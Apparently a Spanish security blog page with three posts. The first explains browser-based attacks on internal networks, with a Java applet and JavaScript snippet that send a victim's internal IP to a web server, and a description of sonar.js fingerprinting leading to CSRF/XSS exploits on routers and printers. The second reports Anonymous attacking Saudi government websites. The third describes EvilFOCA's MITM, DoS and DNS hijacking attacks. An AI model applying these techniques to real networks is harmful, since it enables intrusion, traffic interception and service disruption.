¿Cómo hackear y explotar una red interna e IPs privadas?



Según una encuesta llevada a cabo por una empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?

Bueno, no del todo. Los navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna de acuerdo con profesores de formación de hacking ético. El navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

Cómo alguien puede explotar la red interna

Un experto de una empresa de seguridad informática explica los procedimientos para explotar la red interna:

  • Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers utilizan para la entrega de malware masivo.
  • Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.
  • El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.
  • El malware inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.

Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de

http://webserver/dirección_ip.html?nat = XXXX

<APPLET CODE=”MyAddress.class”>
<PARAM NAME=”URL” VALUE=”http://webserver/ip_address.html?nat=”>
</APPLET>

Si el navegador web de la víctima es un Mozilla/Firefox, es posible omitir el requisito subprograma e invocar un socket de Java directamente desde el JavaScript.

function natIP() {
var w = window.location;
var host = w.host;
var port = w.port || 80;
var Socket = (new
java.net.Socket(host,port)).getLocalAddress().getHostAddress();
return Socket;
}

Framework para explotar la red interna

Sonar
Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.
¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.





Cómo funciona Sonar?
Al cargar el payload de sonar.js en un navegador web moderno sucederá lo siguiente:
  • sonar.js utilizará WebRTC para enumerar las IPs internas que tiene el usuario
  • sonar.js luego intenta encontrar otros hosts vivos en la red interna a través de webSockets.
  • Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de
<img src=”x”> y <link rel=”stylesheet” type=”text/css” href=”x”>
y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.
Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.


De acuerdo con expertos de empresas de seguridad informática, mediante la creación de sus propias fingerprints se pueden construir exploits personalizados que serán lanzados contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.

Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.

Anonymous ataca sitios web en protesta por la condena a crucifixión de un joven


El famoso grupo de 'hackers' Anonymous ha atacado sitios web del gobierno de Arabia Saudita. La ofensiva es en respuesta a la sentencia a crucifixión del joven activista Mohammed al-Nimr, condenado por haber participado en protestas antigubernamentales.

rt.- Ali Mohammed al-Nimr fue detenido el 14 de febrero de 2012 por posesión ilegal de armas de fuego a pesar de no haber evidencias que justificaran el cargo que pesaba sobre él. El joven, que ahora tiene 21 años, fue torturado y forzado a firmar una confesión en 2012. Dos años después, en mayo de 2014, fue condenado a muerte. Una vez rechazada su apelación final, Ali Mohammed al-Nimr podría ser ejecutado en cualquier momento sin que sea notificada su familia.
"Ali Mohammed al-Nimr, un adolescente inocente ha sido condenado a muerte en Arabia Saudita y nos quedamos de brazos cruzados esperando. Naturalmente, la sentencia fue apelada, pero la audiencia de apelación se celebró en secreto y al parecer fue rechazada", según el comunicado de Anonymous dirigido a Arabia Saudita.

El grupo de piratas informáticos exhortó a liberar a Nimr, y agregó que se le había negado el derecho a un abogado y que fue sometido a torturas. "Los activistas también afirman que fue obligado a firmar una confesión, que ha constituido la base de la causa contra él. Ahora cuando todas las vías legales están agotadas Ali puede ser crucificado en cualquier momento", continúa.


Anonymous anunció que lanzó la campaña #OpNimr, atacando sitios web del gobierno. "Esperamos que nos escuchen y liberen al joven. Ustedes serán tratados como un virus y nosotros somos la cura", enfatizaron.

"Cientos de personas inocentes mueren cada año a manos de la política del gobierno saudí y ahora serán castigados por sus acciones", afirmó el grupo en su mensaje.

EvilFOCA - Kit de herramientas para ataque de red

Evil Foca es un conjunto de herramientas de ataque de red para profesionales de pruebas de penetración y auditores de seguridad cuyo propósito es poner a prueba la seguridad en las redes de datos IPv4 e IPv6.



El software analiza automáticamente las redes e identifica todos los dispositivos y sus respectivas interfaces de red, especificando sus direcciones IPv4 y IPv6, así como las direcciones físicas a través de una interfaz cómoda e intuitiva.

Características

La herramienta es capaz de llevar a cabo diversos ataques tales como:

MITM sobre redes IPv4 con ARP Spoofing y DHCP ACK inyección.
MITM en redes IPv6 con Spoofing de Anuncio de Vecino, ataque SLAAC, DHCPv6 falso.
DoS (denegación de servicio) en las redes IPv4 con ARP Spoofing.
DoS (denegación de servicio) en redes IPv6 con SLAAC DoS.
Secuestro de DNS.


Cada sección se explica más a detalle en la sección siguiente.

Técnicas de Man in the middle (MITM)

El bien conocido "hombre en el medio" es un ataque en el que el malhechor crea la posibilidad de leer, añadir o modificar la información que se encuentra en un canal entre dos terminales sin que alguno de estos se de cuenta. Dentro de los ataques MITM en IPv4 e IPv6 de Evil Foca se encuentran las siguientes técnicas:

ARP Spoofing: Consiste en el envío de mensajes ARP a la red Ethernet. Normalmente el objetivo es asociar la dirección MAC del atacante con la IP de otro dispositivo. Cualquier tráfico dirigido a la dirección IP de la puerta de enlace predeterminada será enviado erróneamente al atacante en lugar de a su destino real.
Inyección DHCP ACK: Consiste en el atacante monitoreando los intercambios de DHCP y, en algún momento durante la comunicación, enviar un paquete para modificar su comportamiento. Evil Foca convierte la máquina en un servidor DHCP falso en la red.

Spoofing de Anuncio de Vecino: El principio de este ataque es idéntico al de ARP Spoofing, con la diferencia de que IPv6 no funciona con el protocolo ARP, en cambio toda la información se envía a través de paquetes ICMPv6. Hay cinco tipos de paquetes ICMPv6 utilizados en el protocolo de detección y el Evil Foca genera este tipo de paquetes, situándose entre la puerta de enlace (gateway) y la víctima.

Ataque SLAAC: El objetivo de este tipo de ataque es ser capaz de ejecutar un MITM cuando un usuario se conecta a Internet y un servidor no incluye soporte para IPv6 y al que, por tanto, es necesario conectarse a través de IPv4. Este ataque es posible debido al hecho de que el Evil Foca compromete la resolución de nombres de dominio una vez que está en los medios de comunicación, y es capaz de transformar las direcciones IPv4 en IPv6.

Servidor DHCPv6 falso: Este ataque implica que el atacante se haga pasar por el servidor DCHPv6, respondiendo a todas las solicitudes de red, distribución de direcciones IPv6 y un DNS falso para manipular el destino del usuario o denegar el servicio.

Denegación de Servicio (DoS): El ataque DoS es un ataque a un sistema de máquinas o de red que se traduce en que el servicio o recurso sea inaccesible para sus usuarios. Normalmente provoca la pérdida de conectividad de la red debido al consumo de ancho de banda de la red de la víctima, o sobrecarga de los recursos del sistema de la víctima.

Ataque DoS en IPv4 con ARP Spoofing: Este tipo de ataque DoS consiste en asociar una dirección MAC inexistente en la tabla ARP de la víctima. Esto significa que la máquina cuya tabla ARP se ha modificado sea incapaz de conectarse a la dirección IP asociada a la MAC inexistente.

Ataque DoS en IPv6 con el ataque SLAAC: En este tipo de ataque se genera una gran cantidad de paquetes "Router Advertisement", destinada a una o varias máquinas, anunciando routers falsos y asignación de una dirección IPv6 y puerta de enlace diferente para cada router, colapsando el sistema y logrando que las máquinas no respondan.

Secuestro de DNS: El ataque o secuestro de DNS consiste en la alteración de la resolución del sistema de nombres de dominio (DNS). Esto se puede lograr mediante malware que invalida la configuración de una máquina de TCP/IP para que apunte a un servidor DNS pirata bajo el control del atacante, o por medio de un ataque MITM, con el atacante siendo la parte que recibe las peticiones DNS, y respondiendo a sí mismo a una petición DNS específica para dirigir la víctima hacia un destino específico seleccionado por el atacante.

Puedes descargar EvilFOCA 0.1.4.0 aquí.
Siguenos:
¿Usas Feedly? Suscribete:
follow us in feedly
Anuncios
Lo Más Popular